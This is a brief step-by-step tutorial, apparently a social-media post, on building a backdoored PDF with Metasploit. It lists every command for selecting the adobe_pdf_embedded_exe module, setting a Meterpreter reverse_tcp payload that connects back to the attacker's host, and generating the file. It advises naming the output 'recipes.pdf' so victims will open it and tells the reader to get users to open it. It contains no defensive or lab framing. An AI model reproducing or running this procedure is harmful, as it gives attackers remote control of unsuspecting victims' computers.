🔥How to Embed a backdoor in a PDF file❓

🔥How to Embed a backdoor in a PDF file❓

Step 1)Run Metasploit

Step2) Find the Appropriate Exploit.

I will search metasploits database for an exploit for adobe pdf on windows, using this command:

●Code:msf > search type:exploit platform:windows adobe pdf

You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:

●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 3) Set the Payload

I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:

●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Step 4) Set the exploit options

First, display the required options for the exploit:

●Code:msf > exploit (adobe_pdf_embedded_exe) > show options

You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":

●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf

The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf

Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is

●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST

Step5) Run the Exploit.

Now that all the options are set, we can run the exploit like this:

●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf.

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